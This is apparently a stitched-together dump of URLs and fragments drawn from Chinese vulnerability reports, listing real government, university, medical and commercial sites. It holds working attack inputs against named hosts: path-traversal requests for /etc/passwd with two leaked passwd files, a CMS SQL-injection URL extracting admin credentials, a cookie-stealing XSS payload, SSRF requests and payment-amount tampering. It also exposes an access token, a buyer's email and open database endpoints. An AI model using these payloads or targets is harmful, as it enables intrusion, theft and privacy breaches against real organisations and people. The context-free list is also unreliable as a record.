http://ma.taobao.com/rl/ebc9d0e7d1af2fd18e7aee1ed1f8ebbd http://login.m.taobao.com/qrcodeLoginAuthor.do?qr_t=s http://ma.taobao.com/rl/ebc9d0e7d1af2fd18e7aee1ed1f8ebbd 
https://login.taobao.com/member/loginByIm.do?uid=cntaobaousername&token=0104de9b4363476712b9597780a70a00&time=1425148510364&asker=qrcodelogin&ask_version=1.0.0&defaulturl=http%3A%2F%2Fwww.taobao.com%2F&webpas=1b04fa6f6901df787ce9da8848d1a23d2121730000 http://api.weibo.com/t_short_url?outUrl=http://www.taobao.com http://www.taobao.com/webww/redirect.htm?ssshttp://www.baidu.com https://ebooking.ctrip.com/hotel-supplier-ebookinglogin/EbookingLogin.aspx http://m.ebooking.ctrip.com http://eas.baidu.com/_cat/indices http://localhost:9200/_search http://202.114.181.3:8080/opac/search.php http://202.114.181.3:8080/opac/item.php?marc_no=0000807180#review https://mobile.1qianbao.com:443/mtp-web/p1/op_query_userinfo.json http://www2.ahu.edu.cn/bwc/lawdetail.php?NID=7 http://www2.ahu.edu.cn/bwc/admin/login.php http://xsc.ahu.edu.cn/FormNews.aspx?sy_channel=6 http://wyzx.ahu.edu.cn/list/list.jsp?xxlx=4都存在注入,未深入 http://bbs.thinkworldshop.com.cn/ http://m.yiqifei.com/i/articlelist/365654/0.html http://slj.tonghua.gov.cn/tzgg/class/index.php?key=38 http://bbs.hongzhoukan.com/admin.php http://www.gljyzx.com/tzgg/class/?key=38 http://dev.3g.cn/ site:scal.com.cn filetype:txt http://www.scal.com.cn/Scal.WebMaster/FileUpLoad/ModifyOrderLog/2009-10修改订单记录日志.txt http://202.106.162.194:8080/stdmis/user/logout http://114.215.130.150/Manage_index.php http://www.hnzx.gov.cn/show_a2.aspx?id=100 http://www.chiscdc.com/ http://www.shhgzf.com:8280/index.asp http://221.230.140.60:8080/index.asp http://218.93.201.187:8888/index.asp http://221.230.8.231:8081/ http://222.184.250.2:8001/ http://58.211.131.154:84/ http://58.221.214.82:82/ http://58.214.247.138:8088/indextjgr.asp http://yianjkong.vicp.cc:8081/index.asp http://www.szcdc.cn/wstjnew/index.asp http://www.shhgzf.com:8280 http://www.chiscdc.com/ http://www.shhgzf.com:8280/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://221.230.140.60:8080/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= 
http://218.93.201.187:8888/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://221.230.8.231:8081//dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://222.184.250.2:8001//dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://58.211.131.154:84//dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://58.221.214.82:82//dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://58.214.247.138:8088/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://yianjkong.vicp.cc:8081/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://www.szcdc.cn/wstjnew/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://www.shhgzf.com:8280/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv=为例,上海市化工职业病防治为例 http://www.shhgzf.com:8280/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://www.shhgzf.com:8280/dwcx/detail.asp?idx=10076&dt=&bhkrsl=&mhkadv= http://www.shhgzf.com:8280/dwcx/detail.asp?idx=10080&dt=&bhkrsl=&mhkadv= http://221.1.104.11:8011/ExtWebModels/WebFront/ShowLand.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowLand.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowLand.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowLand.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowLand.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowLand.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowLand.aspx?id= http://lobby.dreambrother.cn:9090/lobby/gold/trade?sn=8bf997e6f86b920b64c68d424cd0f750c8*********************&ln=1&cl=2&ch=apple_yu_center&nu=20&fm=0 http://lobby.dreambrother.cn:9090/gold/trade/alipay/page?sn=8bf997e6f86b920b64c68d424cd0f750c8**********************&orderId=a9c3ae40ecba5bf65764146***********&coins=600.0&subject=金币充值-数量648000&comment=金币可以通过好运来游乐场玩游戏使用 http://lobby.dreambrother.cn:9090/gold/trade/alipay/page?sn=8bf997e6f86b920b64c68d424cd0f750c8379164db3d4983&orderId=a9c3ae40ecba5bf65764146159d4280b&coins=0.001&subject=金币充值-数量648000&comment=金币可以通过好运来游乐场玩游戏使用 http://222.41.169.2/ http://jns.nju.edu.cn/Manage/Roleregister.aspx?username=wooyun 
http://jns.nju.edu.cn/manage/EmployeeManage.aspx http://sr.jxdcw.com/houseview/17/ http://www.jnsqw.gov.cn/html/querylist.aspx www.gqtyzsw.com(2011-08-09) www.zcsgtzyj.gov.cn www.china-shuihu.cn(2011-08-01) www.jnhaibeier.com(2011-08-22) www.jnajj.gov.cn(2011-08-26) http://183.136.157.21/Index.aspx http://price.zol.com.cn/article/new/key_book_list.php?keyword_id=2677&subclass_id=232 http://wsyc.ybklzx.com//Soft/Student/StuManage.aspx http://www.zjkljjx.com/Soft/Student/StuManage.aspx http://www.qwyxjx.com/Soft/Student/StuManage.aspx http://221.214.164.198:1039/Soft/Student/StuManage.aspx http://211.157.186.169:8011/Soft/Student/StuManage.aspx http://222.223.229.50:8080/Soft/Student/StuManage.aspx http://www.sjzsajx.com/Soft/Student/StuManage.aspx http://www.zljx.net:8080//Soft/Student/StuManage.aspx http://111.63.18.151:81/Soft/Student/StuManage.aspx http://www.ylrsjt.com//Soft/Student/StuManage.aspx http://110.249.129.242/Soft/Student/StuManage.aspx http://dhjx.1039.cn/Soft/Student/StuManage.aspx http://www.qwyxjx.com/Soft/Student/StuManage.aspx http://www.ylrsjt.com//Soft/Student/StuManage.aspx http://www.sjzsajx.com//Soft/Student/StuManage.aspx http://110.249.129.242/Soft/Student/StuManage.aspx http://www.whshjx.com/Soft/Student/StuManage.aspx http://www.zjkljjx.com/Soft/Student/StuManage.aspx http://www.xmjdjx.cn/Soft/Student/StuManage.aspx http://www.healthnews.com.tw/readnews.php?id=19917 http://dev.appchina.com/ http://dev.appchina.com/market/common/download_banner.action?appId=100062&filename=../../../../../../../../../../etc/passwd http://dev.appchina.com/market/common/download_bigIcon.action?appId=100062&filename=../../../../../../../../../../etc/passwd http://xtdw.cnxiantao.com/UploadFile/Product/dama.asp http://www.qhdmj.org.cn/news.jsp?id=988 inurl:/xxgk/jcms_files http://dq12333.gov.cn/fileDownload.jsp?fileName=../../../../../../../../../../../etc/passwd www.api.zhuna.cn http://183.131.78.93:9200/_search/ http://www.kibey.com/,他们有个产品还是比较出名的,URL为: 
http://echo.kibey.com/ http://183.131.78.93/#/dashboard/db/kibeycom-stats-system http://www.didapinche.com:9022/app/myincome/?user_cid=469c6750-4ba2-49ce-8baa-43e8640229ac http://zone.wooyun.org/content/18915 http://115.238.170.67:9200/_search http://124.238.233.74:9200/_search http://visa.baidu.com/_search?pretty http://ana.xueshupingtai.com/user/listUser等后台子页面直接访问后台 http://ana.xueshupingtai.com/statics/admin/js/login/login.js等暴露了后台判断机制 http://mba.cufe.edu.cn/root.rar,直接下载全站备份 http://mba.cufe.edu.cn/admission/stupic/100344119992777.jpg http://58.68.250.157 http://58.68.250.157:9200 http://travel.jxntv.cn http://travel.jxntv.cn///tbcat.php?id=380200463 http://update.readboy.com/ http://www.gbiac.net/invoker/JMXInvokerServlet http://renzheng.baidu.com/site/search/?q=a https://rt.foxitsoftware.cn/ http://rc.z jswrc.zjol.com.cn/index_gangwei_x_x.php?id=3105&x=2105 http://content.businessvalue.com.cn http://content.businessvalue.com.cn:80/ http://mei.zoomla.cn/guestbook/Default.aspx?__EVENTTARGET=&txtID=&__VIEWSTATE=&__LASTFOCUS=&EBtnSubmit=a&DropDownList1=1&DDLCate=1&CateID=1&Button1=a&FilePicPath=fbangd&HdnCateID=0&TxtTContent=&TxtTTitle=&__EVENTARGUMENT=&txtName=a http://mei.zoomla.cn/ http://122.13.211.236:9200/_search?pretty http://service.hexun.com/1.aspx http://zhidao.baidu.com/liuyan/detail?id=5809 http://zhidao.baidu.com/api/comment?app=article&thread_id=10000005809&method=get_reply&encoding=gbk&start=0&limit=10&r=1425448854170 https://117.78.4.25:9200/ http://www.chiscdc.com/ http://221.230.140.60:8080/grcx/grdetail.asp?bhkidx=10097 http://218.93.201.187:8888//grcx/grdetail.asp?bhkidx=10097 http://221.230.8.231:8081//grcx/grdetail.asp?bhkidx=10097 http://222.184.250.2:8001//grcx/grdetail.asp?bhkidx=10097 http://www.shhgzf.com:8280/grcx/grdetail.asp?bhkidx=10097 http://218.93.201.187:8888/grcx/grdetail.asp?bhkidx=10097为例:宿迁市疾病预防控制中心 http://218.93.201.187:8888/grcx/grdetail.asp?bhkidx=10097 http://218.93.201.187:8888/grcx/grdetail.asp?bhkidx=10096 
http://218.93.201.187:8888/grcx/grdetail.asp?bhkidx=10096 http://gmdata.lianwifi.com/.svn/all-wcprops http://gmdata.lianwifi.com/.svn/entries http://www.zs.gdciq.gov.cn/4_search_test.jsp http://xueqiu.com/im/image/2DF52_2_1349803048_5331291206_14be7870a2c363fed04e345e.jpg?1440x900 http://www.wooyun.org/bugs/wooyun-2015-091829 http://cx.wap.unisk.cn/user/user/login.action,已经直接显示网页源码了,然后各处翻,终于找到了个注入 http://m.unisk.cn/Count2.asp?id=1320356&speid=300 http://123.125.97.162/admin/manage/ http://123.125.97.162:6060/jcard/demo.php?p= http://i.wo.cn/ http://youxuan.homeinns.com/这个域名 http://www.mafengwo.cn/event/eve_pic.php?iid=3037383 http://www.mafengwo.cn/event/event.php?iid=3037383 http://221.231.103.196:8080/ycfc/manage/login!login.action http://m.yiqifei.com/i/albumlist/704138.html http://m.yiqifei.com/i/albumview/704138/1341.html http://m.yiqifei.com/i/albumlist/704138.html http://218.75.127.195:808/xOA/ http://www.mafengwo.cn/event/eve_show.php?iid=3037383&ga_id=168041 http://bs.hubu.edu.cn/news.aspx?Tname=tb_index&id=1052 http://wzzxbs.mofcom.gov.cn/app/entp/guide http://210.76.69.83/app/entp/guide http://121.10.6.231/app/entp/approve http://218.87.46.161/WebProJX/app/entp/approve http://222.240.202.23:8080/WebProHNFI/app/entp/approve http://210.25.0.75/app/entp/approve http://210.76.69.83/app/entp/guide为例进行测试, http://210.76.69.83/app/entp/faq http://infohubei.com/plus/rss.php http://active.zol.com.cn:80 http://www.laofengxiang.com/data/可目录遍历,如下图所示: http://www.laofengxiang.com/data/lfx_new.20141230.sql中可以得到后台管理员账户及密码md5值,如下所示: http://wkf.homeinns.com/ http://beijing.lashou.com/s/xiuxianyule/i*/all http://www.corporatetravel.ctrip.com/ http://www.myzte.com http://www.gdyueyun.com/Stage/AnnualReport.aspx http://www.gdyueyun.com/Stage/SearchPage.aspx?key a02:40PM a02:40PM a09:28AM http://ldj.jiangmen.gov.cn/flash_upload.php?modelid=1 http://ldj.jiangmen.gov.cn/flash_upload.php 
http://iqqy.gdbnet.cn/MSP/DownloadFiles/DownLoadCab.jsp?filename=../../../../../../../../../../etc/passwd http://iqqy.gdbnet.cn/axis2/axis2-admin/ http://cmu1h.com/view.asp?d_id=4504 http://61.161.172.86/ys/info/28%3b http://59.46.70.155:8080/sign/entrance.jsp?typeId=8c1825c8-e7aa-429a-aec7-871a7e9891a7 http://www.cmu4h.cn/default/contents/content/i/238 http://bdwsw.zhanchenggame.com/admin/ http://www.yfjt.gov.cn//news/showmessage.asp?borderid=%5c*&PageNo=2 http://www.yfjt.gov.cn/news/shownews.asp?newsid=%5c&page=1 http://techshow.ctrip.com/ http://mzaoniao.wm.yiqifei.com/Account/Login?returnUrl=%2FMember http://youhui.egou.com/baoliao/baoliao_publish.htm http://182.92.159.210/index.php http://cloudtouch.91160.com/ http://cloudtouch.91160.com/index.php?c=cancel&a=orderinfo&order_no=1开头八位数的订单号 http://cloudtouch.91160.com//index.php?c=cancel&a=cancelorder&order_no=1开头的八位订单号 http://cloudtouch.91160.com//index.php?c=cancel&a=cancelorder&order_no=18216202 http://211.90.246.47/webele/index.jsp http://www.hfjs.gov.cn/Article/Article.jsp?article_id=130329890560 http://yx.yiqifei.com http://cdp.jsbc.cdvcloud.com/api/v2?userId=xinmeibianji&userName=%E6%96%B0%E5%AA%92%E7%BC%96%E8%BE%91&accessToken=dfd4fe2bf0c1b40debfd40a8fb09ee4f http://124.160.127.151:9200/_search root:x:0:0:root:/root:/bin/bash","bin:x:1:1:bin:/bin:/sbin/nologin","daemon:x:2:2:daemon:/sbin:/sbin/nologin","adm:x:3:4:adm:/var/adm:/sbin/nologin","lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin","sync:x:5:0:sync:/sbin:/bin/sync","shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown","halt:x:7:0:halt:/sbin:/sbin/halt","mail:x:8:12:mail:/var/spool/mail:/sbin/nologin","news:x:9:13:news:/etc/news:","uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin","operator:x:11:0:operator:/root:/sbin/nologin","games:x:12:100:games:/usr/games:/sbin/nologin","gopher:x:13:30:gopher:/var/gopher:/sbin/nologin","ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin","nobody:x:99:99:Nobody:/:/sbin/nologin","nscd:x:28:28:NSCD 
Daemon:/:/sbin/nologin","vcsa:x:69:69:virtual owner:/dev:/sbin/nologin","pcap:x:77:77::/var/arpwatch:/sbin/nologin","rpc:x:32:32:Portmapper user:/:/sbin/nologin","mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin","smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin","ntp:x:38:38::/etc/ntp:/sbin/nologin","sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin","rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin","nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin","dbus:x:81:81:System bus:/:/sbin/nologin","haldaemon:x:68:68:HAL daemon:/:/sbin/nologin","avahi:x:70:70:Avahi daemon:/:/sbin/nologin","avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin","xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin","gdm:x:42:42::/var/gdm:/sbin/nologin","sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin","nexus:x:502:502::/home/nexus:/bin/bash","paasAdmin:x:503:500::/bee/app/paasAdmin:/bin/bash","epedu:x:504:500::/bee/app/epedu:/bin/bash","ixinTest:x:505:500::/bee/app/ixinTest:/bin/bash","ecityServer:x:506:500::/bee/app/ecityServer:/bin/bash","iam:x:507:500::/bee/app/iam:/bin/bash","iam4ixin:x:508:500::/bee/app/iam4ixin:/bin/bash","ecity:x:509:500::/bee/app/ecity:/bin/bash http://211.151.7.139:8082/user/login。显示TCL通讯。 http://180.209.64.253:866/login.aspx http://222.128.5.168:81/introduction/,该网站貌似专注于北邮人脸识别。 http://182.254.201.58:9200/_search http://182.254.196.137:9200/_search http://182.254.201.126:9200/_search http://182.254.202.95:9200/_search http://182.254.232.22:9200/_search 
root:x:0:0:root:/root:/bin/bash","bin:x:1:1:bin:/bin:/sbin/nologin","daemon:x:2:2:daemon:/sbin:/sbin/nologin","adm:x:3:4:adm:/var/adm:/sbin/nologin","lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin","sync:x:5:0:sync:/sbin:/bin/sync","shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown","halt:x:7:0:halt:/sbin:/sbin/halt","mail:x:8:12:mail:/var/spool/mail:/sbin/nologin","uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin","operator:x:11:0:operator:/root:/sbin/nologin","games:x:12:100:games:/usr/games:/sbin/nologin","gopher:x:13:30:gopher:/var/gopher:/sbin/nologin","ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin","nobody:x:99:99:Nobody:/:/sbin/nologin","dbus:x:81:81:System bus:/:/sbin/nologin","vcsa:x:69:69:virtual owner:/dev:/sbin/nologin","abrt:x:173:173::/etc/abrt:/sbin/nologin","haldaemon:x:68:68:HAL daemon:/:/sbin/nologin","ntp:x:38:38::/etc/ntp:/sbin/nologin","saslauth:x:499:76:\"Saslauthd saslauth:/sbin/nologin","postfix:x:89:89::/var/spool/postfix:/sbin/nologin","sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin","tcpdump:x:72:72::/:/sbin/nologin","nscd:x:28:28:NSCD Daemon:/:/sbin/nologin","nslcd:x:65:55:LDAP User:/:/sbin/nologin","nginx:x:498:497:Nginx server:/var/lib/nginx:/sbin/nologin","www:x:10126:10051::/home/www:/sbin/nologin","nagios:x:10127:10127::/home/nagios:/sbin/nologin","apache:x:48:48:Apache:/var/www:/sbin/nologin http://jtzf.cq.gov.cn/ http://jtzf.cq.gov.cn/jeecms/login.jspx http://jtzf.cq.gov.cn/jeecms/login.jspx页面后显示: http://www.yqwgxj.gov.cn/view.asp?n=1012 http://api.bbs.miui.com/ http://api.bbs.miui.com/app/forum/viewthread?tid=$tid http://www.miui.com/thread-2369752-1-1.html http://api.bbs.miui.com/app/forum/viewthread?tid=2369752 http://api.bbs.miui.com/app/forum/reply https://github.com/whitefoxx/xb-test/blob/1a710e4836d0c44edd933369afd3fba65cf8e003/xinshu/settings/production.py http://live.cdvcloud.com/ http://www.gdshzscq.gov.cn/login.do https://sslvpn.comba.com.cn http://mcm.pc.e-health.org.cn/login/ssoLogin_doctor.action 
url:http://211.95.193.67 http://mooc.chaoxing.com/ http://video.chaoxing.com/serie_400000478.shtml http://fmxy.bdschool.cn/content.php?id=1276 http://video.bdschool.cn/person/updateMyAccount.do http://www.hwtrip.com/v3/visa/product/detail?visaID=3 www.wsjf.sdnu.edu.cn http://www.pingan.com/cms-tmplt/portalJsonpController.do?callback=jsonp1&method=articleList&channelId=424&channelLevel=2&number=10&pageNumber=1&publishDate=&_=1425241672662 IP:http://183.129.178.138/ http://183.129.178.138:9200 http://www.ynact-edu.com/web.rar http://www.ynact-edu.com/adminmanager http://www.ynact-edu.com/linkimgs/20153519375773499.aspx http://www.taiwan-story.com.tw/news_content.php?id=337 http://115.29.227.25:8080/Login.aspx https://nykj.91160.com http://adsstory.com/ IP:http://182.92.216.104 http://182.92.216.104:9200 http://59.151.102.38/ http://182.92.3.28 http://182.92.3.28:9200/ https://rt-express.com/rt_home/rb/ogsu_main.php https://rt-express.com/rt_home/be/ogsu_profile.php https://zzyeb.ly.com http://www.u2wifi.cn/ IP:http://182.92.159.210/ http://182.92.159.210:9200 http://115.182.51.225/control.html http://115.182.51.182:8090//web/dept.php http://www.shandongipc.gov.cn/news_p.php?idp=52 http://117.78.0.172/home/news/27 http://115.182.69.104/icsquiz/cocoslin2/ http://iosui.youyuan.com/index.jwml http://iosui.youyuan.com/.svn/entries http://www.cs-airport.com/businessdetails.aspx?id=44&iid=213 http://www.cs-airport.com/CustomerArticle.aspx?t=38&id=51 http://www.cs-airport.com/onlinearticlelist.aspx?id=22 http://www.cs-airport.com/purchasedetails.aspx?id=7&t=2 http://ensupport.zte.com.cn:9080 http://folhk.zte.com.cn:9080 http://oa.homeinns.com http://mail.homeinns.com www.vc.cn http://www.ztemall.com http://m.wxlib.cn/m/info/newbook.action?clsNo=A http://m.wxlib.cn/m/info/newbook.action?clsNo=A https://www.51dns.com/payments/alipay/alipayapi.php?WIDout_trade_no=201503061144180998&WIDshow_url=51DNS.COM&WIDbody=51DNS.COM&WIDsubject=51DNS.COM&WIDtotal_fee=200 
https://www.51dns.com/payments/alipay/alipayapi.php?WIDout_trade_no=订单号&WIDshow_url=51DNS.COM&WIDbody=51DNS.COM&WIDsubject=51DNS.COM&WIDtotal_fee=价格 http://www.gxczzx.gov.cn/news_view.php?id=17911 http://www.xiaohongchun.com/api/user/get_uid?nick=suki_悦 http://oa.eptok.com:8080/vmain/login.jsp http://y.adzhichuan.com/js/webcgi.php?data=eyJib2R5Ijp7InVzZXJfaWQiOi******* http://www.dianyinggongchang.com/?c-feedback-a-addfeedback http://lvxun.yiqifei.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23 http://221.1.104.11:8011/ExtWebModels/WebFront/ShowInvestor.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowInvestor.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowInvestor.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowInvestor.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowInvestor.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowInvestor.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowInvestor.aspx?id= javascript://www.discuz.net/ https://www.51dns.com/member/domain?domain=%22%3E%3Csvg/onload=alert%28document.cookie%29%3E https://www.51dns.com/member/account-edit https://www.51dns.com/member/domain/detail/7834541?controller=members/operate https://www.51dns.com/member/domain/detail/域名ID?controller=members/operate https://www.51dns.com/member/domain/detail/ https://www.51dns.com/member/domain/detail/7834541的源码 file:///storage/local.html http://221.1.104.11:8011/ExtWebModels/LandManage/LandInfoEdit.aspx?id= http://221.2.171.59:8300/ExtWebModels/LandManage/LandInfoEdit.aspx?id= http://demo.inongyou.cn/ExtWebModels/LandManage/LandInfoEdit.aspx?id= http://rctdlz.cn/ExtWebModels/LandManage/LandInfoEdit.aspx?id= 
http://60.2.214.118:8088/ExtWebModels/LandManage/LandInfoEdit.aspx?id= http://121.17.2.52/ExtWebModels/LandManage/LandInfoEdit.aspx?id= http://61.186.154.210:8088/ExtWebModels/LandManage/LandInfoEdit.aspx?id= http://dujia.zhuna.cn/log.txt notify_url_log:isSign=false,discount=0.00&payment_type=1&subject=杭州第一世界大酒店高级房2天1晚+双早+云曼温泉2张&trade_no=2014112738950417&buyer_email=ganlei1984_1984@sina.com&gmt_create=2014-11-27 http://www.huaian.gov.cn http://dzj.huaian.gov.cn http://jw.huaian.gov.cn http://mzzjj.huaian.gov.cn等等 http://fd-txt.pingan.com.cn:8080/friendscircle/rest/article/create www.gddx.cn http://edm.ganji.com/statistics/click?sid=1450011566011&st=20141214&data=aHR0cDovL2FxZW1haWxlLnNuZm5udXcuY29tLw==&ca_name=edm_mainsite-emailconfirm_1450011566011_2&sig=y2UsIAPWVACWyCtMCUZ%2foHgpcYM%3d http://ask.zhidao.189.cn/ http://www.sysbio.org.cn/english/ShowInfo.php?id=8 http://115.182.4.197:8080/login.jsp http://blog.iunios.com http://61.161.206.118:8889/Login.aspx http://218.57.22.48/portal/local/index.html http://121.40.57.148:9200/ http://www.ycscszh.gov.cn/news.asp?ID=241,注入点:ID http://211.90.241.58/WebApp/emoss//files/login/login.jsp www.yztzairport.net https://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049772&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049144&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049217&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049195&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049268&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049209&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049292&ETPA=0 http://ebusiness.pkufi.com/Eservice/MyPolicyInfo.aspx?policyID=2300049250&ETPA=0 http://zhongyi.ifeng.com/ http://www.multigold.com.cn/ http://210.43.126.80:8080/gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 
http://218.75.27.177/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://101.76.99.20/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://211.64.205.214/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://yjsy.wmu.edu.cn:8080/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://61.187.179.68:8080/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://yjsy.wzmc.edu.cn:8080/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://210.43.126.80:8080/gmis/SysMsg/sys_useEdit.aspx?id= http://218.75.27.177/Gmis/SysMsg/sys_useEdit.aspx?id= http://101.76.99.20/Gmis/SysMsg/sys_useEdit.aspx?id= http://211.64.205.214/Gmis/SysMsg/sys_useEdit.aspx?id= http://yjsy.wmu.edu.cn:8080/Gmis/SysMsg/sys_useEdit.aspx?id= http://61.187.179.68:8080/Gmis/SysMsg/sys_useEdit.aspx?id= http://yjsy.wzmc.edu.cn:8080/Gmis/SysMsg/sys_useEdit.aspx?id= http://yjsy.wzmc.edu.cn:8080/Gmis/SysMsg/dmwh.aspx?Table=DM_GB&Field1=GBM&Field2=GB&Title=%u56fd%u522b%u7801 http://211.64.205.214/Gmis/SysMsg/sys_useEdit.aspx?id= intitle:bytevalue http://singularity.geekpark.net/.git/config net:singularity.git http://60.190.151.150/后 http://wap.yichedai.com/index.php/home/index?code=04&error=123123?uname=jillshux&phone=555-666-0606&siteId=1 http://122.112.15.162/index.php https://github.com/hemaoliang/py-machine-learning/blob/fa23b1b1c388d24a0e7a6af4ea3a08e7e03ca1cf/ganjismtp/ganjimail.py http://glxy.mot.gov.cn/, http://glxy.mot.gov.cn/BM/AdmitAction_publishList.do, http://www.adream.org/ http://180.97.68.244:9200/,如图: http://115.182.9.116/admin/ http://srm.hikvision.com http://211.140.151.107/ http://183.129.135.196/ http://gpm.shjgu.edu.cn/ http://202.96.111.90/ http://zhsx.lszjy.com/ http://bysj.zfc.edu.cn/ http://bysj.jxvtc.edu.cn/ http://211.140.151.107/ http://211.140.151.107/wap 
http://211.140.151.107/wap/Check.asp http://211.140.151.107/wap/Check.asp http://211.140.151.107/wap/ http://www.marcopolo.com.cn/flash.html#/CONTACT/Contact_Form http://www.dnion.com/ http://".$ip."/../../../../../../../..".$file http://shop.tcl.com/ http://me.ctrip.com/hotel/myCtrip/login.html im.xxwan.com/*** user.xxwan.com/userInterfacea\=_ bbs.cmge.com/uc_server_ client.cmge.com/gameInfoAction\!getGameInfoDetailByArticleId?articleId\= http://zone.wooyun.org/content/18890 https://github.com/edwinxu/G46POPO/blob/82556fd49e6c28f13f7daa4da3054f2c1440b929/plugin/popoTrigger/triggerTeam/mail.py http://61.185.224.55/login.jsp jdbc:oracle:thin:@172.16.224.200:1521:czww1 android:exported="false",若需要外部调用,需自定义signature或者signatureOrSystem级别的权限 http://222.68.19.99/base/PublicInfo_login.action www.hnxinxi.com http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=图片url http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=http://www.qq.com/ http://www.qq.com/没有数据返回,url末尾添加#p.jpg http://www.qq.com/%23p.jpg http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=http://family.baidu.com%23p.jpg http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=http://erp.baidu.com%23p.jpg http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=http://security.baidu.com%23p.jpg http://www.17u.com/question/ques_search.asp?idtype=2&search_type=dqmore&id=343 http://www.chsin.com/xlcx/zl/query.asp?Page=2&type=&user=zhujunhua http://demo.netinnet.cn/netinnet_zhsx_V3/douploaddatafile?action=common_img&start=upload_img&fm_maxSize=10240&fm_subdir=../ http://www.rcj99.com/ruicj@hjfdfacrdda1233123qwe/ http://drops.wooyun.org/papers/3133 http://ais.oceansking.com.cn/flex/index.jsp http://kaoshi.yjbys.com/kaoshi.yjbys.com.rar http://cloudtouch.91160.com/ http://book.haedu.cn/news/view.asp?ID=51424982 www.muyouguoji.com存在svn漏洞。 http://www.yundaex.us http://www.yundaex.us/member/user_wel.aspx www.yundaex.us 
